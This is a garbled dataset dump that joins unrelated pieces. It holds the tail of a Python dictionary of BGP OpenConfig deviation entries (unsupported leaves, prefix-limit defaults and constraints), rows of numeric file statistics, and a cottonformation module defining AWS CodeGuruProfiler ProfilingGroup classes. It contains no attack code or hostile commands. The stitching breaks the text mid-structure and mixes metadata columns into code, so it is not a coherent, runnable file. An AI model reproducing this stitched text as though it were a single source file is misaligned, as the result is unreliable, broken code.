'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.Config.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.State.allow_own_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.AsPathOptions.State.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Config.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Config.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.ErrorHandling' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.Config.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.local_restarting' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.mode' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.GracefulRestart.State.peer_restarting' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.LoggingOptions' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.State.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.State.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Timers.Config.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Timers.State.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Timers.State.uptime' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Transport.Config.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.Transport.State.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.Neighbors.Neighbor.UseMultiplePaths' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.Config.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.Config.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.State.receive' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AddPaths.State.send_max' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.Config.default_export_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.Config.default_import_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.State.default_export_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.ApplyPolicy.State.default_import_policy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.GracefulRestart.Config.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.GracefulRestart.State.enabled' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6LabelledUnicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.Ipv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnEvpn.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L2VpnVpls.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv4Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Multicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.Config.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.max_prefixes' : {
'deviation_typ' : 'add',
'keyword_value' : [
('must', 'shutdown_threshold_pct and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.restart_timer' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 0),
('must', 'max_prefixes and shutdown_threshold_pct'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.L3VpnIpv6Unicast.PrefixLimit.State.shutdown_threshold_pct' : {
'deviation_typ' : 'add',
'keyword_value' : [
('default', 75),
('must', 'max_prefixes and restart_timer'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.Config.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.advertise_inactive_routes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.enable_aigp' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', 'true'),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.external_compare_router_id' : {
'deviation_typ' : 'replace',
'keyword_value' : [
('default', False),
]
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.RouteSelectionOptions.State.ignore_next_hop_igp_metric' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.UseMultiplePaths.Ebgp' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AfiSafis.AfiSafi.UseMultiplePaths.Ibgp' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.ApplyPolicy' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.Config.allow_own_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.Config.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.State.allow_own_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.AsPathOptions.State.replace_peer_as' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Config.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Config.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.ErrorHandling.Config.treat_as_withdraw' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.ErrorHandling.State.treat_as_withdraw' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.GracefulRestart.Config.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.GracefulRestart.State.helper_only' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.LoggingOptions.Config.log_neighbor_state_changes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.LoggingOptions.State.log_neighbor_state_changes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.peer_type' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.route_flap_damping' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.total_paths' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.State.total_prefixes' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Timers.Config.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Timers.State.connect_retry' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Transport.Config.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.Transport.State.mtu_discovery' : {
'deviation_typ' : 'not_supported',
},
'Bgp.PeerGroups.PeerGroup.UseMultiplePaths' : {
'deviation_typ' : 'not_supported',
},
}
| 38.528544
| 183
| 0.605484
| 5,426
| 60,066
| 6.419278
| 0.024512
| 0.097844
| 0.077517
| 0.113692
| 0.987511
| 0.985903
| 0.985588
| 0.980965
| 0.968792
| 0.909161
| 0
| 0.009661
| 0.252123
| 60,066
| 1,558
| 184
| 38.553273
| 0.765705
| 0
| 0
| 0.506752
| 0
| 0
| 0.633813
| 0.407792
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.004502
| 0
| 0.004502
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
79577b021b7614f443da02698bcfa0027a4ad293
| 5,993
|
py
|
Python
|
cottonformation/res/codeguruprofiler.py
|
MacHu-GWU/cottonformation-project
|
23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b
|
[
"BSD-2-Clause"
] | 5
|
2021-07-22T03:45:59.000Z
|
2021-12-17T21:07:14.000Z
|
cottonformation/res/codeguruprofiler.py
|
MacHu-GWU/cottonformation-project
|
23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b
|
[
"BSD-2-Clause"
] | 1
|
2021-06-25T18:01:31.000Z
|
2021-06-25T18:01:31.000Z
|
cottonformation/res/codeguruprofiler.py
|
MacHu-GWU/cottonformation-project
|
23e28c08cfb5a7cc0db6dbfdb1d7e1585c773f3b
|
[
"BSD-2-Clause"
] | 2
|
2021-06-27T03:08:21.000Z
|
2021-06-28T22:15:51.000Z
|
# -*- coding: utf-8 -*-
"""
This module
"""
import attr
import typing
from ..core.model import (
Property, Resource, Tag, GetAtt, TypeHint, TypeCheck,
)
from ..core.constant import AttrMeta
#--- Property declaration ---
@attr.s
class PropProfilingGroupChannel(Property):
"""
AWS Object Type = "AWS::CodeGuruProfiler::ProfilingGroup.Channel"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html
Property Document:
- ``rp_channelUri``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channeluri
- ``p_channelId``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channelid
"""
AWS_OBJECT_TYPE = "AWS::CodeGuruProfiler::ProfilingGroup.Channel"
rp_channelUri: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "channelUri"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channeluri"""
p_channelId: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "channelId"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-codeguruprofiler-profilinggroup-channel.html#cfn-codeguruprofiler-profilinggroup-channel-channelid"""
#--- Resource declaration ---
@attr.s
class ProfilingGroup(Resource):
"""
AWS Object Type = "AWS::CodeGuruProfiler::ProfilingGroup"
Resource Document: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html
Property Document:
- ``rp_ProfilingGroupName``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-profilinggroupname
- ``p_AgentPermissions``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-agentpermissions
- ``p_AnomalyDetectionNotificationConfiguration``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-anomalydetectionnotificationconfiguration
- ``p_ComputePlatform``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-computeplatform
- ``p_Tags``: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-tags
"""
AWS_OBJECT_TYPE = "AWS::CodeGuruProfiler::ProfilingGroup"
rp_ProfilingGroupName: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.instance_of(TypeCheck.intrinsic_str_type),
metadata={AttrMeta.PROPERTY_NAME: "ProfilingGroupName"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-profilinggroupname"""
p_AgentPermissions: dict = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(dict)),
metadata={AttrMeta.PROPERTY_NAME: "AgentPermissions"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-agentpermissions"""
p_AnomalyDetectionNotificationConfiguration: typing.List[typing.Union['PropProfilingGroupChannel', dict]] = attr.ib(
default=None,
converter=PropProfilingGroupChannel.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(PropProfilingGroupChannel), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "AnomalyDetectionNotificationConfiguration"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-anomalydetectionnotificationconfiguration"""
p_ComputePlatform: TypeHint.intrinsic_str = attr.ib(
default=None,
validator=attr.validators.optional(attr.validators.instance_of(TypeCheck.intrinsic_str_type)),
metadata={AttrMeta.PROPERTY_NAME: "ComputePlatform"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-computeplatform"""
p_Tags: typing.List[typing.Union[Tag, dict]] = attr.ib(
default=None,
converter=Tag.from_list,
validator=attr.validators.optional(attr.validators.deep_iterable(member_validator=attr.validators.instance_of(Tag), iterable_validator=attr.validators.instance_of(list))),
metadata={AttrMeta.PROPERTY_NAME: "Tags"},
)
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#cfn-codeguruprofiler-profilinggroup-tags"""
@property
def rv_Arn(self) -> GetAtt:
"""Doc: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-codeguruprofiler-profilinggroup.html#aws-resource-codeguruprofiler-profilinggroup-return-values"""
return GetAtt(resource=self, attr_name="Arn")
| 57.625
| 244
